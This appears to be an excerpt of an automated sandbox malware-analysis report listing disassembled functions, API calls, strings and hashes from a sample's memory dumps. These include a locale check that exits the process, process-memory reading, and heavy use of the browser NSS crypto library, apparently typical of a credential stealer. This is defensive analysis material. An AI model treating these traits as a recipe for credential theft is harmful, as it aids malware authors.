Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: b9cabbd0243a845de7b1d66a6605881978f05c8f4e963d6b5f17ce24c6967deb
Instruction ID: 65ac2a16c60e3f7bb43cfc38b948579af731b4a7731fae78be84892cb76a3d03
Opcode Fuzzy Hash: b9cabbd0243a845de7b1d66a6605881978f05c8f4e963d6b5f17ce24c6967deb
Instruction Fuzzy Hash: 1AF02711F459382FF71050299C10FC637AA6B11329F4D44A1EA0C6BE92D30DDCE042F1

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
ExitProcess.KERNEL32 ref: 00413465
ExitProcess.KERNEL32 ref: 0041346F
ExitProcess.KERNEL32 ref: 00413479
ExitProcess.KERNEL32 ref: 00413483
ExitProcess.KERNEL32 ref: 0041348D

Strings

*, xrefs: 0041344C

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65

Uniqueness

Uniqueness Score: -1.00%

Function 6C990C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?,?,00000000,?,?), ref: 6C990CB3

Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?), ref: 6C990DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?), ref: 6C990DEC

Part of subcall function 6C9B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C952AF5,?,?,?,?,?,6C950A1B,00000000), ref: 6C9B0F1A
Part of subcall function 6C9B0F10: malloc.MOZGLUE(00000001), ref: 6C9B0F30
Part of subcall function 6C9B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C9B0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?), ref: 6C990DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C991444,?,00000001,?,00000000), ref: 6C990E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?), ref: 6C990E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?,?,00000000), ref: 6C990E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?), ref: 6C990E79

Part of subcall function 6C9A1560: TlsGetValue.KERNEL32(00000000,?,6C970844,?), ref: 6C9A157A
Part of subcall function 6C9A1560: EnterCriticalSection.KERNEL32(?,?,?,6C970844,?), ref: 6C9A158F
Part of subcall function 6C9A1560: PR_Unlock.NSS3(?,?,?,?,6C970844,?), ref: 6C9A15B2

Part of subcall function 6C96B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C971397,00000000,?,6C96CF93,5B5F5EC0,00000000,?,6C971397,?), ref: 6C96B1CB
Part of subcall function 6C96B1A0: free.MOZGLUE(5B5F5EC0,?,6C96CF93,5B5F5EC0,00000000,?,6C971397,?), ref: 6C96B1D2

Part of subcall function 6C9689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C9688AE,-00000008), ref: 6C968A04
Part of subcall function 6C9689E0: EnterCriticalSection.KERNEL32(?), ref: 6C968A15
Part of subcall function 6C9689E0: memset.VCRUNTIME140(6C9688AE,00000000,00000132), ref: 6C968A27
Part of subcall function 6C9689E0: PR_Unlock.NSS3(?), ref: 6C968A35

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: a6d3e81b5e0a47366b1d66f0d652f812c2c9b57c2a3c884fe078071e758bb68d
Instruction ID: c8123d1b85341618edaf8723fc80ac75c3145ec2a69d0c62aa1455ab1685856f
Opcode Fuzzy Hash: a6d3e81b5e0a47366b1d66f0d652f812c2c9b57c2a3c884fe078071e758bb68d
Instruction Fuzzy Hash: 8851D9B5D012015FFB109F64DC81AAB37ACEF29218F191024EC199BB52FB31ED1987A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C9A2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C9A2D7C,6C979192,?), ref: 6C9A248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C9A24A2
memset.VCRUNTIME140(6C9A2D7C,00000020,6C9A2D5C), ref: 6C9A250E
memset.VCRUNTIME140(6C9A2D9C,00000020,6C9A2D7C), ref: 6C9A2535
memset.VCRUNTIME140(?,00000020,?), ref: 6C9A255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C9A2583
PR_Unlock.NSS3(?), ref: 6C9A2594
PR_SetError.NSS3(00000000,00000000), ref: 6C9A25AF

Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 440438ccbabb3cdb509769b592e70e45ff6ce27c38fe8afa7ec7e90d9427a7ad
Instruction ID: 89e234ad136d7f085e22eb0eb3c5a112eb0105b1f40d604b650513da65f27668
Opcode Fuzzy Hash: 440438ccbabb3cdb509769b592e70e45ff6ce27c38fe8afa7ec7e90d9427a7ad
Instruction Fuzzy Hash: 684112B1E007425BEB049FB5CC987B937B8FB59308F146628DC09D7A51F770E586C291

Uniqueness

Uniqueness Score: -1.00%

Function 6C9A05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C9A05DA

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

TlsGetValue.KERNEL32(00000000), ref: 6C9A060C
EnterCriticalSection.KERNEL32 ref: 6C9A0629
TlsGetValue.KERNEL32(00000000), ref: 6C9A066F
EnterCriticalSection.KERNEL32 ref: 6C9A068C
PR_Unlock.NSS3 ref: 6C9A06AA
PK11_GetNextSafe.NSS3 ref: 6C9A06C3
PR_Unlock.NSS3 ref: 6C9A06F9

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: 2844c063b1790ac861b64fd1927032987decc7b9ec3aa1b6b15353e8033500d0
Instruction ID: ece1f0afeac1ab2e8c3a1eccfa78059e3d42dd716f17ec224a6c1cf869dcc988
Opcode Fuzzy Hash: 2844c063b1790ac861b64fd1927032987decc7b9ec3aa1b6b15353e8033500d0
Instruction Fuzzy Hash: F6513AB4A05746CFDB00DFA9C48466AFBF4FF54308F109A29D89A9B711EB30E485CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C9AA470 Relevance: 12.1, APIs: 8, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C9AA4A6

Part of subcall function 6C9B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B08B4

PORT_Alloc_Util.NSS3(?), ref: 6C9AA4EC

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C9AA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C9AA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C9AA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C9AA596
free.MOZGLUE(?), ref: 6C9AA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9AA5B6

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID:
API String ID: 3906949479-0
Opcode ID: ceee59aa7d7d68d200b221148be9d97fa6298650f774ba4233a5ced0cce409a7
Instruction ID: 6b18e5ad76b4209057d443312be9f245ccbd0020c229388a02eab118d584d5c4
Opcode Fuzzy Hash: ceee59aa7d7d68d200b221148be9d97fa6298650f774ba4233a5ced0cce409a7
Instruction Fuzzy Hash: 3B410671A003429FDB10CFD9CC44B9EBBB5AF50318F14C468D8695BB42EB31E91ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9465D0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C94670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C942B2C), ref: 6C94675E
EnterCriticalSection.KERNEL32(?), ref: 6C94678E
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C942B2C), ref: 6C9467E1

Strings

winUnmapfile1, xrefs: 6C946964
winUnmapfile2, xrefs: 6C94698B
winClose, xrefs: 6C9468C5

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-373099266
Opcode ID: 561de812155b939246c10dec456a570423b264e5af1cc37d4070d97ef17b5270
Instruction ID: ac42309672d1fb890c7ed40c54e2050c6dae76cbc635b1efb30e048d4a1a16e5
Opcode Fuzzy Hash: 561de812155b939246c10dec456a570423b264e5af1cc37d4070d97ef17b5270
Instruction Fuzzy Hash: C6A18DB6B41312CBDF0C9F64E898A6D3BB4BF06715B14C068E906DB750DB38E852CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BDF
??_U@YAPAXI@Z.MSVCRT ref: 00413C0D

Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5

VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
??_V@YAXPAX@Z.MSVCRT ref: 00413D73

Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8

Strings

@, xrefs: 00413C66
Z>A, xrefs: 00413C38, 00413C3B

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$Z>A
API String ID: 2950663791-2427737632
Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C99AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C99AB3E,?,?,?), ref: 6C99AC35

Part of subcall function 6C97CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C97CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C99AB3E,?,?,?), ref: 6C99AC55

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C99AB3E,?,?), ref: 6C99AC70

Part of subcall function 6C97E300: TlsGetValue.KERNEL32 ref: 6C97E33C
Part of subcall function 6C97E300: EnterCriticalSection.KERNEL32(?), ref: 6C97E350
Part of subcall function 6C97E300: PR_Unlock.NSS3(?), ref: 6C97E5BC
Part of subcall function 6C97E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C97E5CA
Part of subcall function 6C97E300: TlsGetValue.KERNEL32 ref: 6C97E5F2
Part of subcall function 6C97E300: EnterCriticalSection.KERNEL32(?), ref: 6C97E606
Part of subcall function 6C97E300: PORT_Alloc_Util.NSS3(?), ref: 6C97E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C99AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C99AB3E), ref: 6C99ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C99AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C99AD2B

Part of subcall function 6C97F360: TlsGetValue.KERNEL32(00000000,?,6C99A904,?), ref: 6C97F38B
Part of subcall function 6C97F360: EnterCriticalSection.KERNEL32(?,?,?,6C99A904,?), ref: 6C97F3A0
Part of subcall function 6C97F360: PR_Unlock.NSS3(?,?,?,?,6C99A904,?), ref: 6C97F3D3

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 357ca8a577a36fa28a74ca0f1d855a39c80af0c58e4af7417f3c76e4a3688025
Instruction ID: 4eb227551249b42b2ce2448a24f6de0b9c9d1b2cbdb834942bafc4dfddc1cc8a
Opcode Fuzzy Hash: 357ca8a577a36fa28a74ca0f1d855a39c80af0c58e4af7417f3c76e4a3688025
Instruction Fuzzy Hash: 343127B1E006165FEB008F699C409AF77BAEF94328B1C8528E814ABB40FF31DD1587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C978C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C978C7C

Part of subcall function 6CA19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DC6
Part of subcall function 6CA19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DD1
Part of subcall function 6CA19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA19DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C978CB0
TlsGetValue.KERNEL32 ref: 6C978CD1
EnterCriticalSection.KERNEL32(?), ref: 6C978CE5
PR_Unlock.NSS3(?), ref: 6C978D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C978D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C978D93

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 3d8f059e2aeb9a7b1a02ce213118579e3fd37d1fc10b96ac9732ca738e9b54c0
Instruction ID: 29a27075a03c9308638e0b7a322df9d80d17f01c71539c824a37fb31860ea721
Opcode Fuzzy Hash: 3d8f059e2aeb9a7b1a02ce213118579e3fd37d1fc10b96ac9732ca738e9b54c0
Instruction Fuzzy Hash: F8314371A02202ABE7289F68CD407AAB7B4FF24318F14013AEA1967B50D770E925C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 6C964590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C9645B5

Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C9645C9

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C9645E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C9645F8

Part of subcall function 6C9AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C9A8D2D,?,00000000,?), ref: 6C9AFB85
Part of subcall function 6C9AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C9AFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C964647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA7A0F4,?), ref: 6C96468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C9646A1

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: 614fdf7dfee342b1e1a8faa43ad9cc3a6bad7ac9aaeaf263e7434050cbbb3f96
Instruction ID: 454ad07979a50453d462ede061c5f87ef40e56f9c13fee371d3b5b278889d478
Opcode Fuzzy Hash: 614fdf7dfee342b1e1a8faa43ad9cc3a6bad7ac9aaeaf263e7434050cbbb3f96
Instruction Fuzzy Hash: 8931EAB1A003155BFF108E99DC61BAB36A8EB56318F004039D904EFBC1E775C8098BA6

Uniqueness

Uniqueness Score: -1.00%

Function 6C9A4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C967296,00000000), ref: 6C9A4487
EnterCriticalSection.KERNEL32(?,?,?,6C967296,00000000), ref: 6C9A44A0
PR_Unlock.NSS3(?,?,?,?,6C967296,00000000), ref: 6C9A44BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C967296,00000000), ref: 6C9A44DA
DeleteCriticalSection.KERNEL32(?,?,?,?,6C967296,00000000), ref: 6C9A4530
free.MOZGLUE(?,?,?,?,?,6C967296,00000000), ref: 6C9A453C
PORT_FreeArena_Util.NSS3 ref: 6C9A454F

Part of subcall function 6C98CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C96B1EE,D958E836,?,6C9A51C5), ref: 6C98CAFA
Part of subcall function 6C98CAA0: PR_UnloadLibrary.NSS3(?,6C9A51C5), ref: 6C98CB09

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
